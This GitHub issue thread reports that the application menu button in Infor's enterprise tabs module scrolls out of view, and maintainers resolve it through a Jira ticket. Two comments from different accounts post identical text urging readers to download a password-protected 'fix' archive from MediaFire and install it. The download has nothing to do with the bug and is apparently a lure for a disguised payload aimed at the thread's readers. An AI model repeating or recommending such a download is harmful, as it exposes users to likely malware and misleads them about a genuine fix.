### ISSUE TITLE
Tabs: Application menu button becomes hidden

### ISSUE THREAD

**Issue by inforrpunay** [infor-design/enterprise#8990]
**Describe the bug**
Application menu button becomes hidden when scrolling through module tabs

**To Reproduce**

1. Go to https://latest-enterprise.demo.design.infor.com/components/tabs-module/example-index.html
2. Scroll through the tabs
3. Observe that the application menu button becomes hidden

**Expected behavior**
Application menu button sticks so it remains visible.

**Version**

- ids-enterprise: v4.98.0

**Screenshots**
![image](https://github.com/user-attachments/assets/b859c6e3-1afb-4c54-9014-af259f41df2e)

**Platform**
 - Infor Application/Team Name: Infor M3
 - Device: (if applicable) [e.g. iPhone 6 or Samsung Galaxy S6]
 - OS Version: [e.g. Windows 10 or iOS 8]
 - Browser Name: [e.g. chrome, safari, stock browser]
 - Browser Version: [e.g. 22, 66.0.3359.181 (Official Build) (64-bit)]

**Additional context**

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tmcconechy** [comment]
@ericangeles Figma was on https://github.com/infor-design/enterprise/issues/8831

But this seems like they just want the app menu icon frozen on the tabs.

**Comment by ericangeles** [comment]
Jira ticket for to watch: https://inforwiki.atlassian.net/browse/IDS-4549

**Comment by tmcconechy** [comment]
Fixed as per https://inforwiki.atlassian.net/browse/IDS-4549
